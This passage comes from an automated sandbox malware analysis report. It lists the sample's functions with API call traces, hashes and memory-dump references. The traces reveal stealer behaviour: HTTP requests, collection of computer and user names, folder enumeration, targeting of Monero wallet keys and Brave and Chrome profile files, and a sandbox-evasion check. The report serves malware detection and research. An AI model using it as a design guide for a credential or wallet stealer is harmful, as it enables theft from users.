                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: dfa2cd9f764639c50c7e4815ab3c11c981be28fa90be44c0d67e56d6b8620e20
                              • Instruction ID: b8e927cc234dc70262ca6332e1c4f4e1ef6b019b6759e703881a74c309da93e5
                              • Opcode Fuzzy Hash: dfa2cd9f764639c50c7e4815ab3c11c981be28fa90be44c0d67e56d6b8620e20
                              • Instruction Fuzzy Hash: 45215EB1D00209ABDF10EFA5EC45BDE7B74FF14320F108629F915A7291EB706A09CB81
                              Function 001C51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001B6280: InternetOpenA.WININET(001D0DFE,00000001,00000000,00000000,00000000), ref: 001B62E1
                                • Part of subcall function 001B6280: StrCmpCA.SHLWAPI(?,00EEE498), ref: 001B6303
                                • Part of subcall function 001B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001B6335
                                • Part of subcall function 001B6280: HttpOpenRequestA.WININET(00000000,GET,?,00EED8E8,00000000,00000000,00400100,00000000), ref: 001B6385
                                • Part of subcall function 001B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001B63BF
                                • Part of subcall function 001B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001B63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001C5228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: a0a19a80e2c520b547313a1974e52b5ffb98d559608b474e7b96f9c7c82a13b0
                              • Instruction ID: 86f7068667c8598e858177bf070a893a74939b6e35ced37968ed7f05ff13b595
                              • Opcode Fuzzy Hash: a0a19a80e2c520b547313a1974e52b5ffb98d559608b474e7b96f9c7c82a13b0
                              • Instruction Fuzzy Hash: 6011F830900108ABCB19FB60D952FED7378AF70304F804158F80A4A592EF34EB05CA92
                              Function 001C78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 001C792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 18737637da67ad1624195fd3372e743f1c9f3f61ec17945d3b987c45ebd13fcf
                              • Instruction ID: 1d41544d068af844199f17cbd6e5f17bcfc9591f7d1bdd872a7251f069e38635
                              • Opcode Fuzzy Hash: 18737637da67ad1624195fd3372e743f1c9f3f61ec17945d3b987c45ebd13fcf
                              • Instruction Fuzzy Hash: 310162B1904604EFC704DF94DD45FAABBBCF704B65F10421AE545A3280C3B49900CBA2
                              Function 001B1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 001B112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 001B1132
                              • ExitProcess.KERNEL32 ref: 001B1143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 1e8285f301004f9a7b0c986b8cbfc25b6162d5193202ab22beb4e989b5c0d220
                              • Instruction ID: 75edb6e8398d8d1c86a7c84de6de9271082444b8f7c4858252be2ff6a74300ba
                              • Opcode Fuzzy Hash: 1e8285f301004f9a7b0c986b8cbfc25b6162d5193202ab22beb4e989b5c0d220
                              • Instruction Fuzzy Hash: 70E08CB0A85308FBE710ABA0DC0AB587ABCAB04B42F500044F70CBA1C0C7F42A00DA9A
                              Function 001B10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001B10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001B10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 1934e8898fba9cf009023f80155ecb53fc96e08a3e1d5dcaa1038b5d274d1535
                              • Instruction ID: 75d32ffe8038d3373813f5448de90ad504deee5f9735d6bc82e0479dfdb0aca8
                              • Opcode Fuzzy Hash: 1934e8898fba9cf009023f80155ecb53fc96e08a3e1d5dcaa1038b5d274d1535
                              • Instruction Fuzzy Hash: 01F0E2B1641308BBE714AAA4AC59FBAB7ECE705B15F300448F508E3280D672AE00CAA0
                              Function 001B1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C7910
                                • Part of subcall function 001C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 001C7917
                                • Part of subcall function 001C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 001C792F
                                • Part of subcall function 001C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001B11B7), ref: 001C7880
                                • Part of subcall function 001C7850: RtlAllocateHeap.NTDLL(00000000), ref: 001C7887
                                • Part of subcall function 001C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001C789F
                              • ExitProcess.KERNEL32 ref: 001B11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 60f9e815a73071303e971ec1aef37124d07241475063e7c3d2cab9ad539929a2
                              • Instruction ID: 6c8932885bc3644c2d554d1253824a6e1c16262059f104b9dc01a152ccc64fa2
                              • Opcode Fuzzy Hash: 60f9e815a73071303e971ec1aef37124d07241475063e7c3d2cab9ad539929a2
                              • Instruction Fuzzy Hash: 72E012F591470163DA0073B5AC5AF3A329C5B34745F04082CFA0DD7142FB65F804C966

                              Non-executed Functions

                              Function 001C38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 001C38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 001C38E3
                              • lstrcat.KERNEL32(?,?), ref: 001C3935
                              • StrCmpCA.SHLWAPI(?,001D0F70), ref: 001C3947
                              • StrCmpCA.SHLWAPI(?,001D0F74), ref: 001C395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001C3C67
                              • FindClose.KERNEL32(000000FF), ref: 001C3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 3d1e71b320d00a2194c7115195cd400e1f91545b0e2961e25fbc6e8ff4c21862
                              • Instruction ID: 0a253a50c1dbffd8551db87b4331b8c5751dbdff24ceb928cd0a15b3896927ca
                              • Opcode Fuzzy Hash: 3d1e71b320d00a2194c7115195cd400e1f91545b0e2961e25fbc6e8ff4c21862
                              • Instruction Fuzzy Hash: B0A12EB1A00218ABDB25EBA4DC85FFE737CBB98300F44858DE51D96141EB759B84CF62
                              Function 001C4910 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 001C492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 001C4943
                              • StrCmpCA.SHLWAPI(?,001D0FDC), ref: 001C4971
                              • StrCmpCA.SHLWAPI(?,001D0FE0), ref: 001C4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001C4B7D
                              • FindClose.KERNEL32(000000FF), ref: 001C4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*$8
                              • API String ID: 180737720-308424086
                              • Opcode ID: 3bf9e4bfd667d8e2afe8a14f41dcb58105d5d2142a447625b3c1104733fb4cd1
                              • Instruction ID: 55f2d787f77ae10d70d29b06f272570b1c94bb6cb026af8fc2b05d8e097589b5
                              • Opcode Fuzzy Hash: 3bf9e4bfd667d8e2afe8a14f41dcb58105d5d2142a447625b3c1104733fb4cd1
                              • Instruction Fuzzy Hash: CE6141B2900618ABCB25EBA0DC59FFA777CBB58701F04458CE50D96141EB71EB89CFA1
                              Function 001BBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • FindFirstFileA.KERNEL32(00000000,?,001D0B32,001D0B2B,00000000,?,?,?,001D13F4,001D0B2A), ref: 001BBEF5
                              • StrCmpCA.SHLWAPI(?,001D13F8), ref: 001BBF4D
                              • StrCmpCA.SHLWAPI(?,001D13FC), ref: 001BBF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001BC7BF
                              • FindClose.KERNEL32(000000FF), ref: 001BC7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 32a07f08459d25d321fb854cd1b94c72496f3b0f95733fc5861b4ecc9ddabed7
                              • Instruction ID: 26e30c70c19e3f890d6b0b4692e593af8179f654434b7eef39baf69411738110
                              • Opcode Fuzzy Hash: 32a07f08459d25d321fb854cd1b94c72496f3b0f95733fc5861b4ecc9ddabed7
                              • Instruction Fuzzy Hash: 2B421072910108ABCB15FBA0DD96EED737DAF74304F80455CF50A96191EF34EA49CBA2
                              Function 001C4570 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001C4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C4587
                              • wsprintfA.USER32 ref: 001C45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 001C45BD
                              • StrCmpCA.SHLWAPI(?,001D0FC4), ref: 001C45EB
                              • StrCmpCA.SHLWAPI(?,001D0FC8), ref: 001C4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001C468B
                              • FindClose.KERNEL32(000000FF), ref: 001C46A0
                              • lstrcat.KERNEL32(?,00EEE438), ref: 001C46C5
                              • lstrcat.KERNEL32(?,00EED640), ref: 001C46D8
                              • lstrlen.KERNEL32(?), ref: 001C46E5
                              • lstrlen.KERNEL32(?), ref: 001C46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*$8
                              • API String ID: 671575355-2210567263
                              • Opcode ID: 949959c0512bb487512ac6cf426b5ff82c428823a85e3a99d17f9a8ee8fe359e
                              • Instruction ID: 11b0103d9217e59c698a822facb9a3ee602f11be85ddd99d099d41390ee0d831
                              • Opcode Fuzzy Hash: 949959c0512bb487512ac6cf426b5ff82c428823a85e3a99d17f9a8ee8fe359e
                              • Instruction Fuzzy Hash: FB5144B2540218ABC725EBB0DC99FF9777CAB68700F404588F60D96190EB75DB84CFA2
                              Function 001C3EA0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 001C3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 001C3EDA
                              • StrCmpCA.SHLWAPI(?,001D0FAC), ref: 001C3F08
                              • StrCmpCA.SHLWAPI(?,001D0FB0), ref: 001C3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001C406C
                              • FindClose.KERNEL32(000000FF), ref: 001C4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
